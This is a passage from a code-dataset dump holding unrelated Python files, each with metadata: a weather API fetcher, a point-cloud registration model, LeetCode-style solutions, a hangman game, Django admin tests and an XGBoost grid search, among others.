['sphinx>=1.3'],\n },\n packages=[\n 'bana',\n 'bana.OpenMaya',\n 'bana.OpenMayaAnim',\n 'bana.OpenMayaFX',\n 'bana.OpenMayaRender',\n 'bana.OpenMayaUI',\n ],\n include_package_data=True\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"382274731","text":"from os.path import isfile\r\nfrom urllib.request import urlretrieve\r\nfrom urllib.error import HTTPError\r\nfrom GeoPoint import City\r\nfrom datetime import datetime\r\n\r\n# FOR HINTING\r\nfrom Configuration import Configuration\r\n\r\nimport logging\r\nimport json\r\n\r\nclass ConditionsFetcher:\r\n\r\n citysearch_url_format: str\r\n conditions_url_format: str\r\n city: \"City\"\r\n\r\n def __init__(self, configObj: \"Configuration\"):\r\n\r\n logging.debug(\"Creating ConditionsFetcher\")\r\n self.citysearch_url_format = configObj.citysearch_url_format\r\n self.conditions_url_format = configObj.conditions_url_format\r\n \r\n def fetch_city(self, configObj: \"Configuration\"): pass\r\n def get_conditions(self, configObj: \"Configuration\"): pass\r\n\r\nclass MetaweatherFetcher(ConditionsFetcher):\r\n\r\n def fetch_city(self, configObj: \"Configuration\"): \r\n\r\n logging.debug(\"MetaweatherFetcher(ConditionsFetcher).get_city_id\")\r\n\r\n url = self.citysearch_url_format.substitute(lon = configObj.center_lon, lat = configObj.center_lat)\r\n\r\n if not isfile(\"cityidsearch.txt\"):\r\n logging.info(\"Making a web request for closest city into cityidsearch.txt\")\r\n try:\r\n logging.debug(\"Request successful\")\r\n urlretrieve(url, \"cityidsearch.txt\")\r\n logging.info(\"Successfully fetched %s\" % url)\r\n\r\n except HTTPError:\r\n logging.error(\"Not present %s\" % url)\r\n raise RuntimeError(\"\")\r\n\r\n logging.debug(\"Loading cityidsearch.txt into json parser\")\r\n\r\n search_results_json = json.load(open(\"cityidsearch.txt\", \"r\"))\r\n closest_city = search_results_json[0]\r\n\r\n latt_long = closest_city.get(\"latt_long\").split(\",\")\r\n\r\n self.city = City(Lat = 
float(latt_long[0]), Lon = float(latt_long[1]))\r\n\r\n self.city.api_id = closest_city.get(\"woeid\")\r\n self.city.name = closest_city.get(\"title\")\r\n\r\n distance = closest_city.get(\"distance\") / 1000\r\n\r\n if distance > 40.0:\r\n raise RuntimeWarning(\"Closest available wind data is sourced from more than 40 kilometers\")\r\n\r\n logging.info(\"%s (woeid %i) is %0.2f km away\" % (self.city.name, self.city.api_id, distance))\r\n\r\n def get_conditions(self):\r\n\r\n if not self.city.name:\r\n raise RuntimeError(\"Attempted to get conditions without a city loaded\")\r\n \r\n url = self.conditions_url_format.substitute(woeid = self.city.api_id)\r\n\r\n if not isfile(\"cityconditions.txt\"):\r\n logging.info(\"Making a web request for local conditions into cityconditions.txt\")\r\n try:\r\n logging.debug(\"Request successful\")\r\n urlretrieve(url, \"cityconditions.txt\")\r\n logging.info(\"Successfully fetched %s\" % url)\r\n\r\n except HTTPError:\r\n logging.error(\"Not present %s\" % url)\r\n raise RuntimeError(\"\")\r\n \r\n logging.debug(\"Loading cityconditions.txt into json parser\")\r\n\r\n conditions_json = json.load(open(\"cityconditions.txt\", \"r\"))\r\n weather_report = conditions_json.get(\"consolidated_weather\")\r\n\r\n current_day_weather_report: dict\r\n \r\n for day in weather_report:\r\n if day.get(\"applicable_date\") == datetime.now().strftime(\"%Y-%m-%d\"):\r\n current_day_weather_report = day\r\n \r\n wind_speed_mps = current_day_weather_report.get(\"wind_speed\") * 0.44704\r\n wind_flows_frm = current_day_weather_report.get(\"wind_direction\")\r\n\r\n return (wind_speed_mps, wind_flows_frm)","sub_path":"ConditionsFetcher.py","file_name":"ConditionsFetcher.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"149790890","text":"\ndef staircase(n):\n def helper(cur_n):\n nonlocal n\n if cur_n == 0:\n return\n print('_'*(cur_n-1)+'#'*(n-cur_n+1))\n helper(cur_n-1)\n def helper_2(cur_n):\n nonlocal n\n if cur_n == n:\n return\n print('_'*cur_n + '#'*(n-cur_n))\n helper_2(cur_n+1)\n \n if n == 0:\n return \"Not Draw!\"\n elif n > 0:\n helper(n)\n else:\n n = -1*n\n helper_2(0)\n return ''\n\nprint(staircase(int(input(\"Enter Input : \"))))","sub_path":"lab06_recursive/ch6_5.py","file_name":"ch6_5.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"15898510","text":"import tensorflow as tf\nimport numpy as np\nimport math\nimport sys\nimport os\nimport numpy as np\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(BASE_DIR)\nsys.path.append(os.path.join(BASE_DIR, '../utils'))\nimport helper\nimport tf_util\nimport tf_util_loss\n\nclass Network:\n\tdef placeholder_inputs(self,batch_size, num_point):\n\t\tsource_pointclouds_pl = tf.placeholder(tf.float32, shape=(batch_size, num_point, 3))\n\t\ttemplate_pointclouds_pl = tf.placeholder(tf.float32, shape=(batch_size, num_point, 3))\n\t\treturn source_pointclouds_pl,template_pointclouds_pl\n\n\n\tdef get_model(self, source_point_cloud, template_point_cloud, feature_size, is_training, bn_decay=None):\n\t\tpoint_cloud = tf.concat([source_point_cloud, template_point_cloud], 0)\n\t\tbatch_size = point_cloud.get_shape()[0].value\n\t\tnum_point = point_cloud.get_shape()[1].value\n\t\tend_points = {}\n\n\t\tinput_image = tf.expand_dims(point_cloud, -1)\n\n\t\tnet = tf_util.conv2d(input_image, 64, 
[1,3],\n\t\t\t\t\t\t\t padding='VALID', stride=[1,1],\n\t\t\t\t\t\t\t bn=False, is_training=is_training,\n\t\t\t\t\t\t\t scope='conv1', bn_decay=bn_decay)\n\t\tnet = tf_util.conv2d(net, 64, [1,1],\n\t\t\t\t\t\t\t padding='VALID', stride=[1,1],\n\t\t\t\t\t\t\t bn=False, is_training=is_training,\n\t\t\t\t\t\t\t scope='conv2', bn_decay=bn_decay)\n\n\t\tnet = tf_util.conv2d(net, 64, [1,1],\n\t\t\t\t\t\t\t padding='VALID', stride=[1,1],\n\t\t\t\t\t\t\t bn=False, is_training=is_training,\n\t\t\t\t\t\t\t scope='conv3', bn_decay=bn_decay)\n\t\tnet = tf_util.conv2d(net, 128, [1,1],\n\t\t\t\t\t\t\t padding='VALID', stride=[1,1],\n\t\t\t\t\t\t\t bn=False, is_training=is_training,\n\t\t\t\t\t\t\t scope='conv4', bn_decay=bn_decay)\n\t\tnet = tf_util.conv2d(net, feature_size, [1,1],\n\t\t\t\t\t\t\t padding='VALID', stride=[1,1],\n\t\t\t\t\t\t\t bn=False, is_training=is_training,\n\t\t\t\t\t\t\t scope='conv5', bn_decay=bn_decay)\n\n\t\t# Symmetric function: max pooling\n\t\tnet = tf_util.max_pool2d(net, [num_point,1],\n\t\t\t\t\t\t\t\t padding='VALID', scope='maxpool')\n\t\tnet = tf.reshape(net, [batch_size, -1])\n\t\t \n\t\t# Extract the features from the network.\n\t\tsource_global_feature = tf.slice(net, [0,0], [int(batch_size/2),feature_size])\n\t\ttemplate_global_feature = tf.slice(net, [int(batch_size/2),0], [int(batch_size/2),feature_size])\n\t\treturn source_global_feature, template_global_feature\n\n\tdef get_pose(self,source_global_feature,template_global_feature,is_training,bn_decay=None):\n\t\t# with tf.variable_scope('pose_estimation') as pn:\n\t\tnet = tf.concat([source_global_feature,template_global_feature],1)\n\t\tnet = tf_util.fully_connected(net, 1024, bn=False, is_training=is_training,scope='fc1', bn_decay=bn_decay)\n\t\tnet = tf_util.fully_connected(net, 1024, bn=False, is_training=is_training,scope='fc2', bn_decay=bn_decay)\n\t\tnet = tf_util.fully_connected(net, 512, bn=False, is_training=is_training,scope='fc3', bn_decay=bn_decay)\n\t\tnet = tf_util.fully_connected(net, 512, bn=False, is_training=is_training,scope='fc4', bn_decay=bn_decay)\n\t\tnet = tf_util.fully_connected(net, 256, bn=False, is_training=is_training,scope='fc5', bn_decay=bn_decay)\n\t\tpredicted_transformation = tf_util.fully_connected(net, 7, activation_fn=None, scope='fc6')\n\t\treturn predicted_transformation\n\n\tdef get_loss_b(self,predicted_transformation,batch_size,template_pointclouds_pl,source_pointclouds_pl):\t\n\t\twith tf.variable_scope('loss') as LossEvaluation:\n\t\t\tpredicted_position = tf.slice(predicted_transformation,[0,0],[batch_size,3])\n\t\t\tpredicted_quat = tf.slice(predicted_transformation,[0,3],[batch_size,4])\n\n\t\t\t# with tf.variable_scope('quat_normalization') as norm:\n\t\t\tnorm_predicted_quat = tf.reduce_sum(tf.square(predicted_quat),1)\n\t\t\tnorm_predicted_quat = tf.sqrt(norm_predicted_quat)\n\t\t\tnorm_predicted_quat = tf.reshape(norm_predicted_quat,(batch_size,1))\n\t\t\tconst = tf.constant(0.0000001,shape=(batch_size,1),dtype=tf.float32)\n\t\t\tnorm_predicted_quat = tf.add(norm_predicted_quat,const)\n\t\t\tpredicted_norm_quat = tf.divide(predicted_quat,norm_predicted_quat)\n\t\n\t\t\ttransformed_predicted_point_cloud = helper.transformation_quat_tensor(source_pointclouds_pl, predicted_norm_quat, predicted_position)\n\n\t\t\t# Use 1024 Points to find loss.\n\t\t\t#loss = tf_util_loss.earth_mover(template_pointclouds_pl, transformed_predicted_point_cloud)\n\t\t\tloss = tf_util_loss.chamfer(template_pointclouds_pl, transformed_predicted_point_cloud)\n\t\t\t# loss = 
0\n\t\treturn loss\n\nif __name__=='__main__':\n\twith tf.Graph().as_default():\n\t\tinputs = tf.zeros((32,1024,3))\n\t\toutputs = get_model(inputs, tf.constant(True))\n\t\tprint(outputs)\n","sub_path":"pcrnet/models/pcr_model.py","file_name":"pcr_model.py","file_ext":"py","file_size_in_byte":4410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"396381798","text":"\"\"\"\r\nproblem 30: Substring with Concatenation of All Words\r\nhttps://leetcode.com/problems/substring-with-concatenation-of-all-words/\r\n\r\nsolution:\r\n HASH TABLE\r\n\r\n\"\"\" \r\n\r\nclass Solution(object):\r\n def findSubstring(self, s, words):\r\n \"\"\"\r\n :type s: str\r\n :type words: List[str]\r\n :rtype: List[int]\r\n \"\"\"\r\n result = []\r\n if not words:\r\n return result\r\n table = dict()\r\n for word in words:\r\n if word not in table:\r\n table[word] = 0\r\n table[word] += 1\r\n len_word = len(words[0])\r\n len_words = len(words)\r\n len_string = len(s)\r\n len_all_words = len_word * len_words\r\n for start_index in range(len_string + 1 - len_all_words):\r\n cur_table = dict()\r\n for index in range(start_index, start_index + len_all_words, len_word):\r\n cur_word = s[index:index+len_word]\r\n if cur_word in table:\r\n if cur_word not in cur_table:\r\n cur_table[cur_word] = 0\r\n if cur_table[cur_word] >= table[cur_word]:\r\n break\r\n else:\r\n cur_table[cur_word] += 1\r\n else:\r\n break\r\n else:\r\n result.append(start_index)\r\n return result","sub_path":"P0030.py","file_name":"P0030.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"489130292","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# ---------------------------------------------------------------------\nimport random\nimport QDS\n\n# ---------------------------------------------------------------------\ndef presentGrid():\n # Present grid\n #\n QDS.AwaitTTL() \n\n rot\t= 0.0\n for iT in range(p['nFr']):\n BoxColList = []\n BoxAlpList = []\n BoxRotList = []\n for iB in range(1, nB+1):\n r = random.randint(5, 250)\n g = random.randint(5, 250)\n b = random.randint(5, 250)\n BoxColList.append((r, g, b))\n BoxAlpList.append(127)\n BoxRotList.append(rot)\n rot += p['dRot_step']\n QDS.SetObjColorEx(BoxIndList, BoxColList, BoxAlpList)\n QDS.Scene_RenderEx(p['dtFr_s'], BoxIndList, BoxPosList, BoxMagList,\n BoxRotList, int((iT % p['nPrMark']) == 0))\n\n# ---------------------------------------------------------------------\nQDS.Initialize(\"noise_Colored_wait\", \"Example for await trigger\")\n\n# Set random generator seed\n#\nrandom.seed(1)\n\n# Define global stimulus parameters\n#\np = {}\np['dtFr_s'] = 3/60.0 # presentation time per pattern\np['nFr'] = 50 # # of frames per trial\np['nTrials'] = 5 # # of trials\np['nPrMark'] = 20 # present marker every p['nPrMark']*p['dtFr_s']\np['nRows'] = 20 # dimensions of pattern grid\np['nCols'] = 20\np['boxDx'] = 25 # box size in um\np['boxDy'] = 25\np['dRot_step'] = 0 # angle by which boxes are rotated\n\n# Define objects\n# Generate one box object per grid position\n#\nnB = p['nRows']*p['nCols']\nfor iB in range(1, nB+1):\n QDS.DefObj_Box(iB, p['boxDx'], p['boxDy'])\n\n# Fill list with parameters for every box object\n#\nBoxIndList = []\nBoxPosList = []\nBoxMagList = []\nBoxRotList = []\n\nfor iX in range(p['nCols']):\n for iY in range(p['nRows']):\n iB = 1 +iX +iY*p['nCols']\n x = iX*p['boxDx'] +p['boxDx']/2.0 -p['boxDx']*p['nCols']/2.0\n y = 
iY*p['boxDy'] +p['boxDy']/2.0 -p['boxDy']*p['nRows']/2.0\n BoxIndList.append(iB)\n BoxPosList.append((x,y))\n BoxMagList.append((2.0, 1.0))\n BoxRotList.append(0)\n\n# Start of stimulus run\n#\nQDS.StartScript()\nQDS.Scene_Clear(1.0, 0)\n\nQDS.Loop(p[\"nTrials\"], presentGrid)\n\nQDS.Scene_Clear(1.0, 0)\n\n# Finalize stimulus\n#\nQDS.EndScript()\n\n# ---------------------------------------------------------------------\n","sub_path":"Stimuli/noise_Colored_Wait.py","file_name":"noise_Colored_Wait.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"622217809","text":"# -*- coding: utf-8 -*-\nimport xgboost as xgb\nfrom xgboost.sklearn import XGBRegressor\nfrom sklearn import metrics\nfrom sklearn.model_selection import GridSearchCV\nimport xgbtrain\nfrom xgboost import plot_importance\nfrom matplotlib import pyplot as plt\nimport warnings\nimport numpy as np\nwarnings.filterwarnings(\"ignore\")\n \n#alg传入XGBOOST,X_train传入训练数据特征信息,Y_train传入训练数据标签信息 X_testdata最后要预测的值\ndef XGBmodelfit(alg, X_train, Y_train,X_test=None,Y_test=None,X_predictions=None,useTrainCV=True, cv_folds=5, early_stopping_rounds=200):\n if useTrainCV:\n xgb_param = alg.get_xgb_params()\n xgtrain = xgb.DMatrix(X_train, label=Y_train)\n cvresult = xgb.cv(xgb_param, xgtrain, num_boost_round=alg.get_params()['n_estimators'], nfold=cv_folds,\n metrics='error', early_stopping_rounds=early_stopping_rounds, show_stdv=False)\n alg.set_params(n_estimators=cvresult.shape[0])\n \n #训练模型\n alg.fit(X_train, Y_train,eval_metric='error')\n \n #预测结果:\n dtrain_predictions = alg.predict(X_test) #输出 0 或 1\n # dtrain_predprob = alg.predict_proba(X_test)[:,1] #输出概率\n \n #打印报告信息:\n print(\"\\nModel Report\")\n print(\"Accuracy (Train) : %.4g\" % metrics.accuracy_score(Y_test, dtrain_predictions))\n print(\"AUC Score (Train): %f\" % metrics.roc_auc_score(Y_test, dtrain_predictions))\n print(alg)\n print(\"the best:\")\n print(cvresult.shape[0])\n plot_importance(alg)\n plt.show()\n \n # feat_imp = pd.Series(alg.booster().get_fscore()).sort_values(ascending=False)\n # feat_imp.plot(kind='bar', title='Feature Importances')\n # plt.ylabel('Feature Importance Score')\n \n\n \nx_train,y_train,x_valid,y_valid,x_test,y_test = xgbtrain.built_dataset()\n \nxgb1 = XGBClassifier(\n learning_rate =0.1,\n n_estimators=1000,\n max_depth=5,\n min_child_weight=1,\n gamma=0,\n subsample=0.8,\n colsample_bytree=0.8,\n objective= 'binary:logistic',\n nthread=4,\n scale_pos_weight=1,\n seed=27)\n \n# XGBmodelfit(xgb1,X_train,y_train,X_test,y_test)\n \nparam_grid = {\n 'max_depth':range(3,10,1),\n 'min_child_weight':range(1,9,1),\n 'subsample': np.arange(0.1,1.0,0.1),\n 'colsample_bytree':np.arange(0.1,1.0,0.1)\n}\n# param_grid = {\n# 'max_depth':[7,8],\n# 'min_child_weight':[4,5]\n# }\n\n\n#gsearch1 = GridSearchCV(estimator = XGBClassifier(\n# learning_rate =0.1, n_estimators=140, max_depth=9,\n# min_child_weight=1, gamma=0, subsample=0.8,colsample_bytree=0.8,\n# objective= 'binary:logistic', nthread=4,scale_pos_weight=1, seed=27),\n# param_grid=param_grid,cv=10)\n\n\ngsearch1 = GridSearchCV(estimator = XGBRegressor(\n learning_rate =0.2, \n objective= 'binary:logistic', \n booster= 'gbtree',\n eta=0.2,\n max_depth=4, # 4 3\n colsample_bytree=0.7, #0.8\n subsample= 0.7,\n min_child_weight=1, # 2 3\n silent= 0,\n eval_metric='error',),\n 
param_grid=param_grid,cv=10)\ngsearch1.fit(np.array(x_train),np.array(y_train))\nprint(gsearch1.best_params_,gsearch1.best_score_)\n\n","sub_path":"xgboost(弃用)/gridsearch.py","file_name":"gridsearch.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"496591920","text":"import random\r\nimport time\r\nfrom colored import fg, attr\r\nfrom turtle import Turtle, Screen\r\n\r\nturtle = Turtle()\r\nturns = 10\r\nchar = None\r\ntest = \"\"\r\n\r\n\r\ndef InitTurtle():\r\n screen = Screen()\r\n screen.setup(width=0.333, height=0.333, startx=1200, starty=100)\r\n screen.bgcolor(\"black\")\r\n screen.title(\"Hangman\")\r\n turtle.speed(5)\r\n turtle.color(\"red\")\r\n\r\n\r\ndef Turtle():\r\n if not correct:\r\n if turns == 9:\r\n turtle.circle(50, -180)\r\n elif turns == 8:\r\n turtle.circle(50, 90)\r\n turtle.right(90)\r\n turtle.forward(200)\r\n elif turns == 7:\r\n turtle.right(90)\r\n turtle.forward(100)\r\n elif turns == 6:\r\n turtle.right(90)\r\n turtle.forward(50)\r\n elif turns == 5:\r\n turtle.right(90)\r\n turtle.circle(30)\r\n turtle.circle(30, 180)\r\n elif turns == 4:\r\n turtle.right(90)\r\n turtle.forward(20)\r\n elif turns == 3:\r\n turtle.left(30)\r\n turtle.forward(20)\r\n elif turns == 2:\r\n turtle.back(20)\r\n turtle.right(60)\r\n turtle.forward(20)\r\n elif turns == 1:\r\n turtle.back(20)\r\n turtle.left(30)\r\n turtle.back(10)\r\n turtle.right(90)\r\n turtle.forward(10)\r\n elif turns == 0:\r\n turtle.right(180)\r\n turtle.forward(20)\r\n turtle.hideturtle()\r\n\r\n\r\nInitTurtle()\r\n\r\nprint(\" \")\r\nprint('Herzlich Willkommen zu meinem \"Guess the Word\" Game!')\r\n\r\nwhile next:\r\n\r\n turtle.pensize(2)\r\n turtle.penup()\r\n turtle.goto(-100, -100)\r\n turtle.showturtle()\r\n turtle.pendown()\r\n turtle.setheading(-90)\r\n\r\n white = fg('#bfbfbf') + attr('reset')\r\n green = fg('#008000') + attr('bold')\r\n yellow = fg('#808000') + attr('bold')\r\n red = fg('#ff0000') + attr('bold')\r\n\r\n dark_green = fg('#00ff00') + attr('bold')\r\n dark_red = fg('#800000') + attr('bold')\r\n\r\n easy = green + '\"Easy\"'\r\n medium = yellow + '\"Medium\"'\r\n hard = red + '\"Hard\"'\r\n\r\n comma = white + \", \"\r\n\r\n print(\" \")\r\n difficulty = input('Gebe den Schwierigkeitsgrad an (' + easy + comma + medium + comma + hard + white + '): ')\r\n while next:\r\n difficulty = difficulty.lower()\r\n if difficulty == \"easy\":\r\n difficulty = easy\r\n char = random.randint(4, 6)\r\n break\r\n elif difficulty == \"medium\":\r\n difficulty = medium\r\n char = random.randint(7, 10)\r\n break\r\n elif difficulty == \"hard\":\r\n difficulty = hard\r\n char = random.randint(11, 15)\r\n break\r\n else:\r\n print(\" \")\r\n difficulty = input('Gebe einen gültigen Schwierigkeitsgrad an (' + easy + white + comma + medium\r\n + comma + hard + white + '): ')\r\n\r\n print(\" \")\r\n print(\"Gewählter Schwierigkeitsgrad: \" + difficulty + white)\r\n\r\n print(\" \")\r\n time.sleep(0.5)\r\n print(\"Ein zufälliges Wort wird ausgesucht...\")\r\n time.sleep(1)\r\n\r\n wordslist = []\r\n with open(\"words.txt\", \"r\", encoding=\"latin1\") as f:\r\n for line in f:\r\n if len(line) == char:\r\n wordslist.extend(line.split())\r\n\r\n wordslength = len(wordslist)\r\n wordslength -= 1\r\n solution = random.randint(0, wordslength)\r\n solution = wordslist[solution]\r\n solution = solution.lower()\r\n solutionlength = len(solution)\r\n\r\n guesses = \"\"\r\n\r\n print(\"Lösungswort: \" + (\"_\" * 
solutionlength) + \" (\" + str(solutionlength) + \" Buchstaben)\")\r\n\r\n invalid = True\r\n\r\n guess = input(\"Gebe einen Buchstaben ein: \")\r\n\r\n while invalid:\r\n if guess.isalpha():\r\n guess = guess.lower()\r\n invalid = False\r\n\r\n if turns == 0:\r\n print(\"Lösungswort: \" + solution.capitalize())\r\n print(\" \")\r\n time.sleep(0.25)\r\n print(dark_red + \"Du verlierst!\" + white)\r\n\r\n else:\r\n while turns > 0:\r\n guesses += guess\r\n\r\n if guess in solution:\r\n turns -= 1\r\n print(dark_red + \"Richtig\" + white)\r\n time.sleep(0.25)\r\n print(\" \")\r\n correct = True\r\n\r\n while turns > 0:\r\n failed = 0\r\n print(\"Lösungswort: \", end=\"\")\r\n for char in solution:\r\n if char in guesses:\r\n print(char, end=\"\")\r\n test = test + char\r\n else:\r\n print(\"_\", end=\"\")\r\n test = test + char\r\n failed += 1\r\n if failed == 0:\r\n turns -= 1\r\n print(\"\", end=\"\\n\")\r\n print(\" \")\r\n time.sleep(0.25)\r\n print(dark_green + \"Du gewinnst!\" + white)\r\n turns = 0\r\n break\r\n\r\n else:\r\n print(dark_green + \"Falsch\" + white)\r\n time.sleep(0.25)\r\n print(\" \")\r\n correct = False\r\n break\r\n\r\n Turtle()\r\n\r\n if turns == 0:\r\n print(\" \")\r\n time.sleep(1)\r\n nextround = input('Möchtest du nochmals eine Runde spielen? Schreibe ' + dark_green + '\"J\" für Ja'\r\n + white + ' oder ' + dark_red + '\"N\" für Nein' + white + '! ')\r\n nextround = nextround.lower()\r\n if nextround == \"j\" or nextround == \"ja\":\r\n print(\" \")\r\n turtle.clear()\r\n break\r\n else:\r\n print(\"Vielen Dank fürs spielen!\")\r\n quit()\r\n\r\n else:\r\n print(\" (\" + str(solutionlength) + \" Buchstaben)\")\r\n print(\"Du hast noch \" + str(turns) + \" Versuche!\")\r\n\r\n invalid = True\r\n\r\n while invalid:\r\n guess = input(\"Gebe einen gültigen Buchstaben ein: \")\r\n if not guess.isalpha():\r\n print(\" \")\r\n print(dark_red + \"Dies ist kein gültiger Buchstabe!\" + white)\r\n print(\" \")\r\n guess = input(\"Gebe einen richtigen Buchstaben ein: \")\r\n print(\" \")\r\n else:\r\n guess = guess.lower()\r\n invalid = False\r\n break\r\n\r\n else:\r\n print(\" \")\r\n print(dark_red + \"Dies ist kein gültiger Buchstabe!\" + white)\r\n print(\" \")\r\n guess = input(\"Gebe einen gültigen Buchstaben ein: \")\r\n","sub_path":"Guess_the_Word_v5.0.py","file_name":"Guess_the_Word_v5.0.py","file_ext":"py","file_size_in_byte":7201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"243058834","text":"\"\"\"\n题目:输入一个字符串,打印出该字符串中字符的所有排列。\n例如,输入字符串 abc,则打印出由字符 a, b, c 所能排列出的所有字符串\nabc、acb、bac、bca、cab 和 cba。\n\"\"\"\n\n\ndef permutation(string):\n if not string:\n return\n\n char_list = list(string)\n permutation_core(char_list, 0)\n\n\ndef permutation_core(char_list, index):\n length = len(char_list)\n\n if index == length:\n string = ''.join(char_list)\n print(string)\n else:\n for i in range(index, length):\n temp = char_list[i]\n char_list[i] = char_list[index]\n char_list[index] = temp\n\n permutation_core(char_list, index + 1)\n\n temp = char_list[i]\n char_list[i] = char_list[index]\n char_list[index] = temp\n\n\ndef test():\n test_case1 = \"a\"\n test_case2 = \"abc\"\n test_case3 = \"\"\n test_case4 = None\n\n print(\"字符串 {} 中的字符排列: \".format(test_case1))\n permutation(test_case1)\n print(\"字符串 {} 中的字符排列: \".format(test_case2))\n permutation(test_case2)\n print(\"字符串 {} 中的字符排列: \".format(test_case3))\n permutation(test_case3)\n print(\"字符串 {} 中的字符排列: \".format(test_case4))\n 
permutation(test_case4)\n\n\nif __name__ == '__main__':\n test()\n","sub_path":"38-字符串的排列/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"545676240","text":"import json\n\nfrom django.contrib.admin.sites import AdminSite\nfrom django.utils.html import format_html\n\nfrom olympia import amo\nfrom olympia.amo.tests import (TestCase, addon_factory, user_factory,\n version_factory)\nfrom olympia.amo.urlresolvers import reverse\nfrom olympia.scanners.admin import ScannersResultAdmin\nfrom olympia.scanners.models import ScannersResult\n\n\nclass TestScannersResultAdmin(TestCase):\n def setUp(self):\n super().setUp()\n\n self.user = user_factory()\n self.grant_permission(self.user, 'Admin:Advanced')\n self.client.login(email=self.user.email)\n self.list_url = reverse('admin:scanners_scannersresult_changelist')\n\n self.admin = ScannersResultAdmin(model=ScannersResult,\n admin_site=AdminSite())\n\n def test_list_view(self):\n response = self.client.get(self.list_url)\n assert response.status_code == 200\n\n def test_list_view_is_restricted(self):\n user = user_factory()\n self.grant_permission(user, 'Admin:Curation')\n self.client.login(email=user.email)\n response = self.client.get(self.list_url)\n assert response.status_code == 403\n\n def test_has_add_permission(self):\n assert self.admin.has_add_permission(request=None) is False\n\n def test_has_delete_permission(self):\n assert self.admin.has_delete_permission(request=None) is False\n\n def test_has_change_permission(self):\n assert self.admin.has_change_permission(request=None) is False\n\n def test_formatted_addon(self):\n addon = addon_factory()\n version = version_factory(\n addon=addon,\n channel=amo.RELEASE_CHANNEL_LISTED\n )\n result = ScannersResult(version=version)\n\n assert self.admin.formatted_addon(result) == (\n '{} (version: {})'.format(\n reverse('reviewers.review', args=[addon.slug]),\n addon.name,\n version.id\n )\n )\n\n def test_formatted_addon_without_version(self):\n result = ScannersResult(version=None)\n\n assert self.admin.formatted_addon(result) == '-'\n\n def test_listed_channel(self):\n version = version_factory(\n addon=addon_factory(),\n channel=amo.RELEASE_CHANNEL_LISTED\n )\n result = ScannersResult(version=version)\n\n assert self.admin.channel(result) == 'listed'\n\n def test_unlisted_channel(self):\n version = version_factory(\n addon=addon_factory(),\n channel=amo.RELEASE_CHANNEL_UNLISTED\n )\n result = ScannersResult(version=version)\n\n assert self.admin.channel(result) == 'unlisted'\n\n def test_channel_without_version(self):\n result = ScannersResult(version=None)\n\n assert self.admin.channel(result) == '-'\n\n def test_formatted_results(self):\n results = {'some': 'results'}\n result = ScannersResult(results=results)\n\n assert self.admin.formatted_results(result) == format_html(\n '
<pre>{}</pre>
',\n json.dumps(results, indent=2)\n )\n\n def test_formatted_results_without_results(self):\n result = ScannersResult()\n\n assert self.admin.formatted_results(result) == '
<pre>{}</pre>
'\n","sub_path":"src/olympia/scanners/tests/test_admin.py","file_name":"test_admin.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"520685246","text":"import functools\nimport types\n\nfrom werkzeug.contrib.cache import GAEMemcachedCache\n\nimport malcat\n\n\nMEMCACHE_TIMEOUT = malcat.config.get('MEMCACHE_TIMEOUT')\n\n\nclass Cache(GAEMemcachedCache):\n\n def decorate(self, func):\n @functools.wraps(func)\n def get_item(*args, **kwargs):\n if func.__name__ is 'get_list':\n key_suffix = 'list'\n elif func.__name__ is 'get_status_info':\n key_suffix = 'status_info'\n else:\n key_suffix = func.__name__\n\n key = '-'.join(list(map(lambda arg: str(arg).lower(), args)) + [key_suffix])\n value = self.get(key)\n if value is None:\n value = func(*args, **kwargs)\n # Can't cache generators\n if isinstance(value, types.GeneratorType):\n value = list(value)\n\n try:\n self.set(key, value, MEMCACHE_TIMEOUT)\n except ValueError:\n # value is too large for memcache\n pass\n return value\n return get_item\n\n\nmemcache = Cache(None, MEMCACHE_TIMEOUT)\n","sub_path":"malcat/server/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"406026151","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution(object):\n def sortedArrayToBST(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: TreeNode\n \"\"\"\n if (nums == []):\n return\n elif len(nums) == 1:\n return TreeNode(nums[0])\n \n val = nums[len(nums)/2]\n rightArr = nums[len(nums)/2 + 1:]\n leftArr = nums[:len(nums)/2]\n return TreeNode(val, self.sortedArrayToBST(leftArr), self.sortedArrayToBST(rightArr))\n","sub_path":"SortedArrayToBinaryTree/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"107259167","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nDatabaker script to create dataset: ASHE Table 7\n\nUses all tabs from an ASHE table zip file, 16 files for Earnings, the remaining 6 for Hours\n\nexample zip url: \n\n\nLogic\n------\nASHE is amost perfect structure wise with all visual relationships being shown in columns A and B.\n\nTherefore rather than databaking the wholelot cell by cell, we're loading each tab into a dataframe then using databaker \nto establish those viusal relationships and 